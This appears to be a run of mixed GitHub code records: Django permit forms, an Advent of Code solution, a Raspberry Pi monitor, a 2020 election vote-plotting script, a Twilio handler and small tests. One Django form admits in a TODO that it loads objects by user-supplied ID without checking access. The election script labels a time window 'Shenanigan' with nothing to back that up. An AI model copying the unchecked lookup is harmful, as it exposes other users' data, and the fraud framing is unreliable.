parent=parent\n ),\n required=False,\n )\n self.fields[name].widget.attrs[\"hidden\"] = \"\"\n self.fields[name].widget.attrs[\"class\"] = \"child-type\"\n self.fields[name].label = \"\"\n\n def save(self, commit=True):\n document = super().save(commit=False)\n # TODO: move logic to model\n # Backoffice uploads are stored together in dedicated structure and regrouped by permit_request ID\n document.document.field.upload_to = (\n f\"backoffice_uploads/{document.submission_id}\"\n )\n # set the child type as the documents type\n document.document_type = models.ComplementaryDocumentType.objects.filter(\n pk=self.cleaned_data[\n \"parent_{}\".format(self.cleaned_data[\"document_type\"].pk)\n ].pk\n ).get()\n\n if commit:\n document.save()\n\n return document\n\n def clean_document(self):\n document = self.cleaned_data.get(\"document\")\n\n # Document is not required, as user can also use a generated report\n if document:\n services.validate_file(document)\n\n return document\n\n def clean(self):\n cleaned_data = super().clean()\n\n # TODO: validation errors raised here don't appear in the template\n\n if not self.cleaned_data.get(\n 
\"authorised_departments\"\n ) and not self.cleaned_data.get(\"is_public\"):\n raise ValidationError(\n _(\n \"Un département doit être renseigner ou le document doit être publique\"\n )\n )\n\n if self.cleaned_data.get(\"document\") and self.cleaned_data.get(\n \"generate_from_model\"\n ):\n raise ValidationError(\n _(\n \"Vous pouvez soit uploader un fichier, soit générer un document à partir d'un modèle, mais pas les deux.\"\n )\n )\n\n if not self.cleaned_data.get(\"document\") and not self.cleaned_data.get(\n \"generate_from_model\"\n ):\n raise ValidationError(\n _(\n \"Vous devez soit uploader un fichier, soit générer un document à partir d'un modèle.\"\n )\n )\n\n # If document is null, it must be because we use a preset\n if not cleaned_data.get(\"document\"):\n generate_from_model = cleaned_data.get(\"generate_from_model\")\n try:\n (\n form_pk,\n report_pk,\n child_doc_type_pk,\n transaction_pk,\n ) = generate_from_model.split(\"/\")\n except ValueError:\n raise ValidationError(\n _(\"Selection invalide pour génération à partir du modèle !\")\n )\n\n kwargs = {\n \"form_id\": form_pk,\n \"report_id\": report_pk,\n }\n if self.submission.get_transactions():\n rel_transaction = (\n self.submission.get_transactions().filter(pk=transaction_pk).last()\n )\n if rel_transaction is not None:\n kwargs.update({\"transaction_id\": rel_transaction.pk})\n report_response = generate_report_pdf_as_response(\n self.request.user, self.submission.pk, **kwargs\n )\n cleaned_data[\"document\"] = File(\n io.BytesIO(b\"\".join(report_response.streaming_content)),\n name=report_response.filename,\n )\n # TODO CRITICAL: ensure user has access to these objects\n # •To be filtered by user\n child_doc_type = models.ComplementaryDocumentType.objects.get(\n pk=child_doc_type_pk\n )\n cleaned_data[\"document_type\"] = child_doc_type\n cleaned_data[f\"parent_{child_doc_type.pk}\"] = child_doc_type.parent\n\n if not self.cleaned_data.get(\"document_type\"):\n return cleaned_data\n\n if not cleaned_data[\"parent_{}\".format(cleaned_data.get(\"document_type\").pk)]:\n raise ValidationError(_(\"Un sous-type doit être renseigné!\"))\n\n return cleaned_data\n\n\nclass AnonymousRequestForm(forms.Form):\n required_css_class = \"required\"\n captcha = CaptchaField(required=True)\n\n\nclass SubmissionInquiryForm(forms.ModelForm):\n start_date = forms.DateField(\n label=_(\"Date de début\"),\n input_formats=[settings.DATE_INPUT_FORMAT],\n widget=DatePickerInput(\n options={\n \"format\": \"DD.MM.YYYY\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n }\n ),\n )\n end_date = forms.DateField(\n label=_(\"Date de fin\"),\n input_formats=[settings.DATE_INPUT_FORMAT],\n widget=DatePickerInput(\n options={\n \"format\": \"DD.MM.YYYY\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n }\n ),\n )\n\n class Meta:\n model = models.SubmissionInquiry\n fields = [\"start_date\", \"end_date\", \"documents\"]\n\n def __init__(self, submission, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.submission = submission\n self.fields[\n \"documents\"\n ].queryset = models.SubmissionComplementaryDocument.objects.filter(\n submission=submission\n ).all()\n self.fields[\"documents\"].help_text = _(\n \"Attention, les documents non-publics seront public une fois la mise en consultation publique démarrée!\"\n )\n\n def clean_start_date(self):\n start_date = self.cleaned_data.get(\"start_date\")\n\n if start_date and start_date < datetime.today().date():\n raise ValidationError(\n _(\"La date de début doit être postérieure à 
la date d'aujourd'hui.\")\n )\n\n return start_date\n\n def clean(self):\n cleaned_data = super().clean()\n start_date = self.cleaned_data.get(\"start_date\")\n end_date = self.cleaned_data.get(\"end_date\")\n\n if not start_date:\n return cleaned_data\n\n if end_date < start_date:\n raise ValidationError(\n _(\"La date de fin doit être postérieure à la date de début.\")\n )\n\n overlap = models.SubmissionInquiry.objects.filter(\n Q(submission=self.submission)\n & Q(end_date__gte=start_date)\n & Q(start_date__lte=end_date)\n )\n if overlap and not self.instance.pk:\n raise ValidationError(\n _(\"Une enquête est déjà en cours pendant cette période\")\n )\n\n return cleaned_data\n\n def save(self, commit=True):\n inquiry = super().save(commit=False)\n\n # insure all the documents added to the inquiry are public\n # if, not, make them public\n for document in self.cleaned_data[\"documents\"]:\n if document.is_public:\n continue\n\n document.is_public = True\n document.save()\n\n if commit:\n inquiry.save()\n self.save_m2m()\n\n return inquiry\n\n\ndef get_submission_contacts_formset_initiated(submission, data=None):\n \"\"\"\n Return PermitActorFormSet with initial values set\n \"\"\"\n\n # Queryset with all configured contact forms for this submission\n configured_contact_forms = submission.get_contacts_forms()\n\n has_any_dynamic_contacts_forms = submission.has_any_dynamic_contacts_forms()\n\n # Get contact forms that are not filled yet for the submission\n missing_contact_forms = submission.filter_only_missing_contact_forms(\n configured_contact_forms\n )\n\n contact_initial_forms = [\n {\"contact_form\": contact_form[0]} for contact_form in missing_contact_forms\n ]\n\n nb_extra = 10\n\n if has_any_dynamic_contacts_forms:\n extra = len(contact_initial_forms) + nb_extra\n else:\n extra = len(contact_initial_forms)\n\n SubmissionContactFormset = modelformset_factory(\n models.SubmissionContact,\n form=SubmissionContactForm,\n extra=extra,\n )\n\n formset = SubmissionContactFormset(\n initial=contact_initial_forms,\n queryset=models.SubmissionContact.objects.filter(\n submission=submission\n ).select_related(\"contact\"),\n data=data,\n )\n\n mandatory_contact_forms = {\n contact_form\n for contact_form, is_mandatory, is_dynamic in configured_contact_forms\n if is_mandatory\n }\n\n for form in formset:\n form.empty_permitted = (\n \"contact_form\" not in form.initial\n or form.initial[\"contact_form\"] not in mandatory_contact_forms\n )\n form.fields[\"contact_form\"].widget.attrs[\"readonly\"] = True\n form.fields[\"contact_form\"].widget.attrs[\"hidden\"] = True\n\n if has_any_dynamic_contacts_forms:\n for extra in range(nb_extra):\n extra += 1\n new_form = formset[len(formset) - extra]\n dynamic_types = configured_contact_forms.filter(is_dynamic=True).values(\n \"type\"\n )\n types_filtered = new_form.fields[\"contact_form\"].queryset.filter(\n id__in=dynamic_types\n )\n new_form.fields[\"contact_form\"].queryset = types_filtered\n new_form.fields[\"contact_form\"].widget.attrs[\"class\"] = \"extra-form\"\n new_form.fields[\"contact_form\"].widget.attrs[\"readonly\"] = False\n new_form.fields[\"contact_form\"].widget.attrs[\"hidden\"] = False\n\n return formset\n\n\ndef get_submission_forms(submission):\n fields_form = FieldsForm(instance=submission)\n appendices_form = AppendicesForm(instance=submission)\n fields_by_object_type = dict(fields_form.get_form_fields_by_form())\n appendices_by_object_type = dict(appendices_form.get_form_fields_by_form())\n amend_custom_fields_values = 
submission.get_amend_custom_fields_values()\n amend_custom_properties_by_object_type = defaultdict(list)\n for value in amend_custom_fields_values:\n amend_custom_properties_by_object_type[value.form.form].append(value)\n forms_infos = [\n (\n selected_form.form,\n fields_by_object_type.get(selected_form.form, []),\n appendices_by_object_type.get(selected_form.form, []),\n amend_custom_properties_by_object_type[selected_form.form],\n )\n for selected_form in submission.selected_forms.all()\n ]\n\n return forms_infos\n\n\nclass SubmissionValidationsForm(forms.ModelForm):\n class Meta:\n model = models.SubmissionValidation\n fields = [\"department\", \"comment\", \"comment_is_visible_by_author\"]\n\n def __init__(self, *args, **kwargs):\n super(SubmissionValidationsForm, self).__init__(*args, **kwargs)\n if self.instance.id:\n self.fields[\"department\"].widget.attrs[\"readonly\"] = True\n self.fields[\"department\"].widget.attrs[\"hidden\"] = True\n","repo_name":"yverdon/geocity","sub_path":"geocity/apps/submissions/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":72388,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"29708102406","text":"from clock import Clock\nfrom calander import Calander\n\n\nclass Time(Calander, Clock):\n def __init__(self, day, month, year, hours=0, minutes=0, seconds=0):\n Calander.__init__(self, day, month, year)\n Clock.__init__(self, hours, minutes, seconds)\n\n def __str__(self):\n return Calander.__str__(self) + \", \" + Clock.__str__(self)\n\n\nif __name__ == '__main__':\n x = Time(24, 12, 57)\n print(x)\n for i in range(1000):\n x.tick()\n for i in range(1000):\n x.advance()\n print(x)\n","repo_name":"vikassri/Python","sub_path":"Basic/Oops/clock/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30153805813","text":"import sys\nimport numpy as np\n\ndef read_positions():\n positions = []\n for line in sys.stdin:\n positions.append([[int(y) for y in x.split(\",\")] for x in line.strip().split(\"->\")])\n return np.array(positions)\n\ndef get_map_size(positions):\n return (np.max(positions[:, :, 0]) + 1, np.max(positions[:, :, 1]) + 1)\n\ndef draw_vert(_map, x, ys):\n [y1, y2] = ys\n if y1 < y2:\n _map[x, y1:y2 + 1] += 1\n else:\n _map[x, y2:y1 + 1] += 1\n return _map\n\ndef draw_hor(_map, xs, y):\n [x1, x2] = xs\n if x1 < x2:\n _map[x1:x2 + 1, y] += 1\n else:\n _map[x2:x1 + 1, y] += 1\n return _map\n\ndef draw_diag(_map, p):\n [[x1, y1], [x2, y2]] = p\n [x_diff, y_diff] = [x2 - x1, y2 - y1]\n x_incrementor = -1 if x_diff < 0 else 1\n y_incrementor = -1 if y_diff < 0 else 1\n\n [x, y] = [x1, y1]\n while True:\n _map[x, y] += 1\n if [x, y] == [x2, y2]:\n break\n x += x_incrementor\n y += y_incrementor\n\n return _map\n \n\ndef main():\n positions = read_positions()\n map_size = get_map_size(positions)\n _map = np.zeros(map_size, dtype=int)\n \n for p in positions:\n [[x1, y1], [x2, y2]] = p\n if x1 == x2:\n _map = draw_vert(_map, x1, [y1, y2])\n elif y1 == y2:\n _map = draw_hor(_map, [x1, x2], y1)\n else:\n _map = draw_diag(_map, p)\n print(\"Number of overlaps:\\t\" + str(np.count_nonzero(_map >= 2)))\n\nif __name__ == \"__main__\":\n 
main()","repo_name":"Limeman/advent_of_code","sub_path":"2021/day_5/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15058082733","text":"import pandas as pd\r\nimport numpy as np\r\nimport csv \r\nimport matplotlib.pyplot as plt\r\nimport datetime\r\n\r\nfrom datetime import datetime, timedelta\r\n\r\ntest = pd.read_csv(r'C:\\Elec\\nyt_ts.csv')\r\neevp_source = test['eevp_source']\r\n\r\n#set df (dataframe) to table\r\ndf = pd.read_csv (r'C:\\Elec\\nyt_ts.csv')\r\n\r\n#print (df)\r\n#print (eevp_source)\r\n\r\n#Save column eevp_source to file name eevp_source.csv\r\n#eevp_source.to_csv(r'C:\\Elec\\eevp_source.csv')\r\n\r\n#sort dataframe by vote_share_rep descending\r\n#df.sort_values(by=['vote_share_rep'], inplace=True, ascending=False)\r\n\r\n# sort by multiple columns: state and vote_share_rep\r\n\r\ntemp_table = df.sort_values(by=['state','timestamp'])\r\n\r\n#get rightmost 10 char for Date\r\nDate = temp_table['timestamp'].str[:10]\r\n\r\nmy_string=temp_table['timestamp']\r\n#print (my_string.str.split(\"T\",1))\r\n\r\n#add columns with split date/time ---'expand=True argument expands data across 2 columns\r\n#temp_table[['Date_Split','Time_Split']] = temp_table.timestamp.str.split(\"T\",1,expand=True)\r\n#_______________SPlit time stamp field by \"T\" convert formats of time and date and concatenate\r\n#split Time/Date and assign to 2 arrays, format both to pd.to_datetime\r\nDateTime = temp_table.timestamp.str.split(\"T\",1,expand=True)\r\nDate, Time = DateTime[0], DateTime[1]\r\nTime = Time.str[:-1] #remove Z off last charachter\r\n#_______________\r\nDate = pd.to_datetime(Date) # Convert to pandas date/time format\r\nDate_Format = Date.dt.strftime('%m/%d')\r\nTime = pd.to_datetime(Time)\r\nTime_Format = Time.dt.strftime('%H:%M') #Capitalize H, M, S for time format\r\nprint(Time_Format)\r\nDate_Time_Format = (Date_Format + \" \" + Time_Format)\r\nprint(Date_Time_Format)\r\n\r\n#______________convert timestamp to pd_to_datetime and subtract 4 hours for EST (previous string converts not needed)\r\nConvert_Time = pd.to_datetime(temp_table['timestamp']) - timedelta(hours = 5)\r\n\r\n#______________format to m/d H:M\r\nTime_adj = Convert_Time.dt.strftime('%m/%d %H:%M') #https://www.tutorialspoint.com/python/time_strftime.htm\r\n\r\n#insert columns with split date/time\r\ntemp_table.insert(loc=6, column='Time_Est', value=Convert_Time)\r\ntemp_table.insert(loc=7, column='Date_Split', value=Date_Format)\r\ntemp_table.insert(loc=8, column='Time_Split', value=Time_Format)\r\ntemp_table.insert(loc=9, column='Date_Time_Format', value=Date_Time_Format)\r\ntemp_table.insert(loc=10, column='Time_adj', value=Time_adj)\r\n\r\n#perform scalar calculations\r\nRep_Dem_VoteSplit = temp_table['vote_share_rep'] / (temp_table['vote_share_rep'] \\\r\n + temp_table['vote_share_dem'])\r\ntemp_table['Rep/Dem Vote Split'] = Rep_Dem_VoteSplit\r\n\r\n#user np.where for if...then, shift() defaults to previous row, diff(1) needs period specified to only return difference of prev row\r\n#if state = state from line above\r\ntemp_table['Vote_Batch'] = np.where(temp_table['state'].eq(temp_table['state'].shift()), temp_table['votes'].diff(1), 0)\r\n#.eq can be used on columns or entire dataframe\r\n\r\n#replace negative values with zero\r\ntemp_table['Vote_Batch'] = np.where(temp_table['Vote_Batch'] < 0, 0, temp_table['Vote_Batch'])\r\n\r\ntemp_table['Cum_Rep_Votes'] = 
temp_table['vote_share_rep'] * temp_table['Vote_Batch']\r\n\r\nprint (temp_table)\r\n\r\n#SAVE DATAFRAME\r\n#temp_table.to_csv(r'C:\\Elec\\temp_table.csv')\r\n\r\n#get portion of dataframe based on value of column\r\n#df.loc[df['column_name'].isin(some_values)]\r\n\r\n#**********************************************************\r\nName_State = \"texas\"\r\n\r\n#***********************************************************\r\nstate = temp_table.loc[temp_table['state'] == Name_State]\r\nprint(state['Time_Est'].index)\r\nShenaniganStart = pd.to_datetime('2020-11-04 01:00').tz_localize('UTC') #attach a timezone to match with search range timezone\r\nShenaniganEnd = pd.to_datetime('2020-11-04 07:00').tz_localize('UTC')\r\n#find closest value in range\r\nidx =state['Time_Est'].sub(ShenaniganStart).abs().idxmin()\r\nidx2 =state['Time_Est'].sub(ShenaniganEnd).abs().idxmin()\r\nprint(idx)\r\n\r\ntestvar =state['vote_share_rep'].sub(.6).abs().idxmin()\r\n\r\nstate_sum = state['Vote_Batch'].sum()\r\n\r\n#Build even time series around first and last date/time of sample\r\nFirst_Date = pd.to_datetime(state['Time_Est'].head(1))\r\nLast_Date = pd.to_datetime(state['Time_Est'].tail(1))\r\n\r\nFirst_Date = First_Date.dt.strftime('%Y-%m-%d %H:%M') #format to YYYY-M-D H:M\r\nLast_Date =Last_Date.dt.strftime('%Y-%m-%d %H:%M')\r\n\r\nFirst_Date = First_Date.values[0] #knock off index number, just get value\r\nLast_Date = Last_Date.values[0]\r\n\r\nprint(First_Date)\r\n\r\n#range = pd.date_range('2009-06-01 05:00', '2009-06-30 05:00', freq='1H')\r\nrange = pd.date_range(First_Date, Last_Date, periods=len(state['Time_Est']))\r\n#t_index = pd.DatetimeIndex(pd.date_range(start='2009-06-01', end='2009-06-30'), freq=\"1h\")\r\n\r\nprint(range)\r\n#Dual Y axis plot attempt #1\r\n#plt.tight_layout()\r\n\r\n\r\nax = state.plot(kind='line', x='Time_adj', y='Rep/Dem Vote Split', color='blue', style='.', \\\r\n legend=False, rot=45, figsize=(10,7))\r\nax2 = state.plot(kind='bar', x='Time_adj', y='votes', color='red', secondary_y=True, \\\r\n ax = ax.twinx(), rot =45, alpha = .2, width = 1, legend=False, figsize=(10,7)) #alpha = transparency\r\nax3 = state.plot(kind='line', x='Time_adj', y='votes2016', color='green', secondary_y=True, \\\r\n ax = ax2, linewidth=2, alpha = 1, linestyle = \":\") \r\nax4 = state.plot(kind='line', x='Time_adj', y='votes2012', color='purple', secondary_y=True, \\\r\n ax = ax2, linewidth=2, alpha = 1, linestyle = \":\") \r\nax.axvline(idx-state.head(1).index, color='black', linestyle='-', lw=.5, alpha = .5) # take index number minus first index number of 'state'\r\nax.axvline(idx2-state.head(1).index, color='black', linestyle='-', lw=.5, alpha = .5) # take index number minus first index number of 'state'\r\n\r\nax3.legend(frameon=False)\r\nax2.legend([\"Total Votes 2016\", \"Total Votes 2012\", \"Cumulative Votes 2020\"], loc=\"upper left\")\r\nprint(state)\r\n\r\nplt.title(Name_State)\r\n#ax.set_xticklabels(ax, fontsize=8)\r\n\r\n#ax.grid(axis='y',b=True, which='both', color='0.65')\r\n# Major ticks every 20, minor ticks every 5\r\nmajor_ticks = np.arange(.25, .75, .25)\r\nminor_ticks = np.arange(.25, .75, .1)\r\nax.set_yticks(major_ticks)\r\nax.set_yticks(minor_ticks, minor=True)\r\nax.grid(axis='y', which='major', alpha =.75 , linestyle='-', color='0.25')\r\nax.grid(axis='y', which='minor', alpha = .25, linestyle='--', color='0.65')\r\n\r\nax.set_ylabel('% Trump/Biden', color='b')\r\nax2.set_ylabel('Total # Votes (MM)', color='r')\r\nax.set_xlabel('Time 
EST')\r\n\r\n#ax.yaxis.set_major_locator(.1)\r\n#ax.yaxis.set_major_locator(plt.MaxNLocator(6)) #manually set number of ticks across y axis\r\nax2.xaxis.set_major_locator(plt.MaxNLocator(20)) \r\n\r\nax.tick_params(axis=\"x\", labelsize=8)\r\n\r\nbob = ax.legend()\r\n# ax.legend(loc=0)\r\nprint(state_sum)\r\nplt.show()\r\n\r\n\r\n","repo_name":"BoxCarWilly/Repo1","sub_path":"ElecData.py","file_name":"ElecData.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8756461668","text":"# Add the functions in this file\nimport json\ndef load_journal(x):\n \n f=open(x)\n l=json.load(f)\n f.close()\n return l\n\ndef compute_phi(fn,ev):\n jfile=load_journal(fn)\n x=[]\n y=[]\n n11=n00=n01=n10=0\n n1_=n_1=n0_=n_0=0\n for i in jfile:\n if ev in i['events']:\n x.append(True)\n else:\n x.append(False)\n y.append(i['squirrel'])\n \n for i in range(len(jfile)):\n if x[i] and y[i]:\n n11+=1\n if not x[i] and not y[i]:\n n00+=1\n \n if x[i] and not y[i]:\n n10+=1\n if not x[i] and y[i]:\n n01+=1\n if x[i]:\n n1_+=1\n if not x[i]:\n n0_+=1\n if y[i]:\n n_1+=1\n if not y[i]:\n n_0+=1\n #print(n11,n00,n01,n10,n1_,n_1,n0_,n_0)\n a=(n11*n00) - (n10*n01)\n b=(n1_*n0_*n_1*n_0)**(0.5)\n #print(a,b)\n return ((n11*n00) - (n10*n01))/(n1_*n0_*n_1*n_0)**(0.5)\n\ndef compute_correlations(fn):\n jfile=load_journal(fn)\n d={}\n for i in jfile:\n for j in i['events']:\n if j not in d:\n d[j]=compute_phi(fn,j)\n return d\n\ndef diagnose(fn):\n d=compute_correlations(fn)\n cal=d.values()\n for key,value in d.items():\n if value==max(cal):\n a=key\n if value==min(cal):\n b=key\n return a,b\n\n\n\n\n\n\n","repo_name":"Genskill2/004-bootcamp-json-abhiarik","sub_path":"correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38217979195","text":"#-*- encoding:utf-8 -*-\n#/usr/bin/ipython3\n\nimport sys,os,time,json,urllib,shelve,random,datetime,collections,math\nimport gensim\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model, datasets\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import accuracy_score,recall_score,roc_auc_score,confusion_matrix,classification_report\n\ntrain_path = 'input/train_201701_201704_mod100.csv'\nvalid_path = 'input/valid_201701_201704_mod100.csv'\n\nTRAIN_FEATS = [\n 'user_city',\n 'past_tag_num',\n 'item_sex_0_ctr', \n 'item_sex_1_ctr', \n 'item_age_0_ctr', #-,20\n 'item_age_1_ctr', #20,30\n 'item_age_2_ctr', #30,40\n 'item_age_3_ctr', #40,50\n 'item_city_0_ctr',\n 'item_city_1_ctr',\n ]\nTRAIN_FEATS = [\n 'user_sex',\n 'user_age',\n 'user_city',\n 'past_tag_num',\n 'user_sex_0',\n 'user_sex_1',\n 'user_age_1',\n 'user_age_2',\n 'user_age_3',\n 'user_city_0',\n 'user_city_1',\n 'user_city_3',\n 'item_sex_0_ctr',\n 'item_sex_1_ctr',\n 'item_age_0_ctr',\n 'item_age_1_ctr',\n 'item_age_3_ctr',\n 'item_city_0_ctr',\n 'item_city_1_ctr',\n ]\ndf = pd.read_csv(train_path)\nX_train, y_train = df[TRAIN_FEATS].values, df.label.values\n\ndf = pd.read_csv(valid_path)\nX_valid, y_valid = df[TRAIN_FEATS].values, df.label.values\n\nlr = linear_model.LogisticRegression(C=1e4)\nlr.fit(X_train, y_train)\n\nthreshold = 0.2\n\nprint(\"train summary:\")\nprint(classification_report(y_true=y_train, y_pred=np.where(lr.predict_proba(X_train)[:,1] > threshold, 1, 0)))\n\nprint(\"test summary:\")\nprint(classification_report(y_true=y_valid, 
y_pred=np.where(lr.predict_proba(X_valid)[:,1] > threshold, 1, 0)))\n\n# df = pd.read_csv(train_path)\n# X,y = df[TRAIN_FEATS].values, df.label.values\n# kf = KFold(n_splits=2)\n# lr = None\n# for train, test in kf.split(X):\n# print()\n# print('kfold train:%d test:%d' % (len(train), len(test)))\n# X_train = X[train]\n# y_train = y[train]\n# X_test = X[test]\n# y_test = y[test]\n# lr = linear_model.LogisticRegression(C=1e5)\n# lr.fit(X_train, y_train)\n\n# y_true = y_train\n# y_pred = np.where(lr.predict_proba(X_train)[:,1] > threshold, 1, 0)\n# print(\"train summary:\")\n# print(classification_report(y_true, y_pred))\n\n# y_true = y_test\n# y_pred = np.where(lr.predict_proba(X_test)[:,1] > threshold, 1, 0)\n# print(\"valid summary:\")\n# print(classification_report(y_true, y_pred))\n\n","repo_name":"liuslevis/Word2Rec","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"18622432171","text":"import os\nimport time\nfrom prettytable import PrettyTable\nimport sys\n \n# Return CPU temperature as a character string \ndef getCPUtemperature():\n res = os.popen('vcgencmd measure_temp').readline()\n return(res.replace(\"temp=\",\"\").replace(\"'C\\n\",\"\"))\n \n# Return RAM information (unit=kb) in a list \n# Index 0: total RAM \n# Index 1: used RAM \n# Index 2: free RAM \ndef getRAMinfo():\n p = os.popen('free')\n i = 0\n while 1:\n i = i + 1\n line = p.readline()\n if i==2:\n return(line.split()[1:4])\n \n# Return % of CPU used by user as a character string \ndef getCPUuse():\n return(str(os.popen(\"top -n1 | awk '/Cpu\\(s\\):/ {print $2}'\").readline().strip(\\\n)))\n \n# Return information about disk space as a list (unit included) \n# Index 0: total disk space \n# Index 1: used disk space \n# Index 2: remaining disk space \n# Index 3: percentage of disk used \ndef getDiskSpace():\n p = os.popen(\"df -h /\")\n i = 0\n while 1:\n i = i +1\n line = p.readline()\n if i==2:\n return(line.split()[1:5])\n \n \n \nif __name__ == '__main__':\n title = ['item','value']\n t = PrettyTable(title)\n while 1:\n t.clear_rows()\n # CPU informatiom\n CPU_temp = getCPUtemperature()\n CPU_usage = getCPUuse()\n \n # RAM information\n # Output is in kb, here I convert it in Mb for readability\n RAM_stats = getRAMinfo()\n RAM_total = round(int(RAM_stats[0]) / 1000,1)\n RAM_used = round(int(RAM_stats[1]) / 1000,1)\n RAM_free = round(int(RAM_stats[2]) / 1000,1)\n \n # Disk information\n DISK_stats = getDiskSpace()\n DISK_total = DISK_stats[0]\n DISK_used = DISK_stats[1]\n DISK_perc = DISK_stats[3]\n\n t.add_row(['CPU Temperature',CPU_temp])\n t.add_row(['CPU Use',CPU_usage + '%'])\n t.add_row(['RAM Total',str(RAM_total)+' MB'])\n t.add_row(['RAM Used',str(RAM_used)+' MB'])\n t.add_row(['RAM Free',str(RAM_free)+' MB'])\n t.add_row(['DISK Total Space',str(DISK_total)+'B'])\n t.add_row(['DISK Used Space',str(DISK_used)+'B'])\n t.add_row(['DISK Used Percentage',str(DISK_perc)])\n \n os.system('clear')\n print(t)\n\n ","repo_name":"YooPh/PythonCodeList","sub_path":"获取树莓派状态信息/GetPiStatus.py","file_name":"GetPiStatus.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5686784473","text":"def dat(a, b):\r\n z = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30]\r\n d = 0\r\n for j in range(0, a - 1):\r\n d += z[j]\r\n if b % 4 == 0 and a > 2:\r\n d += 1\r\n return d\r\n\r\ndef 
word(x):\r\n if x == 0:\r\n return \"Monday\"\r\n elif x == 1:\r\n return \"Tuesday\"\r\n elif x == 2:\r\n return \"Wednesday\"\r\n elif x == 3:\r\n return \"Thursday\"\r\n elif x == 4:\r\n return \"Friday\"\r\n elif x == 5:\r\n return \"Saturday\"\r\n elif x == 6:\r\n return \"Sunday\"\r\n\r\ny = list(map(int, input().split()))\r\na = y[2] % 100\r\nb = y[2] // 100\r\nif a % 2 == 1:\r\n a += 11\r\na = int(a / 2)\r\nif a % 2 == 1:\r\n a += 11\r\na = 7 - (a % 7)\r\nb = 5*(b % 4) % 7 + 1\r\na = (a + b) % 7\r\nc = y[0] + dat(y[1], y[2])\r\nc = c % 7 - 3\r\nc += a\r\nif y[2] % 4 == 0 and y[1] <= 2:\r\n if y[2] % 400 == 0 or y[2] % 100 != 0:\r\n c -= 1\r\nc = c % 7\r\nprint(word(c))","repo_name":"MediocreBoris/gitgud","sub_path":"Weekday.py","file_name":"Weekday.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29316583591","text":"#!/usr/bin/env python\n\nimport unittest\nimport Queue\nimport grabber\n\nclass TestGrabber(unittest.TestCase):\n def setUp(self):\n self.feed_queue = Queue.Queue()\n self.grabber = grabber.Grabber(self.feed_queue)\n\n def test_clear_tables(self):\n self.grabber.clear_tables('AA')\n feed_name, action = self.grabber.feed_queue.get()\n self.assertEqual(feed_name, 'AA')\n self.assertEqual(action, 'clear_table')\n\n def test_read_config(self):\n self.grabber.read_config()\n feed_name = self.grabber.feeds[0][0]\n self.assertEqual(feed_name, 'hn')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"diarized/rss2irc","sub_path":"tests/unit/test_grabber.py","file_name":"test_grabber.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"42649826833","text":"import os\nfrom urllib.parse import unquote\n\nfrom requestHandler import validate_request\nfrom textHandler import parse_text, send_acknowledgement_text\nfrom pubsubHandler import launch_app\n\n\n## Terraform bools not capitalized unlike Python\nDEBUG = True if os.environ[\"debug\"] == \"true\" else False\n\n\n## https://flask.palletsprojects.com/en/1.1.x/api/#incoming-request-data\ndef main(request):\n if DEBUG: print(\"DEBUG: starting Twilify reception main function\")\n\n ## validate text event\n source_num = unquote(validate_request(request.form))\n if not source_num:\n return\n if DEBUG: print(\"DEBUG: validated text event\")\n\n ## parse text event for any keywords\n playlist_params = parse_text(DEBUG, request.form[\"Body\"])\n\n ## Generate acknowledgement text response\n choices_captured = \"Message received!\"\n if len(playlist_params.keys()) > 0:\n choices_captured = \" \".join(playlist_params.keys()) + \" requests captured\"\n \n ## if user requested music, acknowledge and echo back any keywords detected\n if \"seeds\" not in playlist_params:\n response_body = \"New music update coming right away. 
\\n\"\n send_acknowledgement_text(DEBUG, source_num, response_body+choices_captured)\n\n ## launch app with parameters and number to txt back to\n playlist_params[\"user_number\"] = source_num\n if DEBUG: print(\"DEBUG: Launching Twilify app\")\n message_response = launch_app(playlist_params)\n\n if DEBUG: print(f\"DEBUG: {message_response}\")\n return {\n \"status\": \"200\",\n \"body\": \"success\"\n }\n","repo_name":"nbailey20/Twilify","sub_path":"gcp/functions/twilify-reception/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29256238897","text":"import pytest\nimport yatest.common\nimport json\n\nimport yt.wrapper as yt\n\nfrom maps.garden.sdk.test_utils import data\n\nfrom maps.garden.sdk.core import Version\nfrom maps.garden.sdk.resources import FileResource\nfrom maps.garden.sdk.yt import YtDirectoryResource\n\nfrom maps.garden.modules.offline_search_cache_validator.lib import tests_splitter\nfrom maps.garden.modules.offline_search_cache_validator.lib import offline_search_cache_validator\nfrom maps.garden.modules.offline_search_cache_validator.lib.resource_names import GEOID_TREES_BY_POVS\n\nVERSION = \"09.02.22-0\"\n\n\ndef _create_tables(yt_client, geosrc_dir_resource, data_path):\n\n def _create_table(path, schema):\n yt_table_path = yt.ypath_join(geosrc_dir_resource.path, path)\n 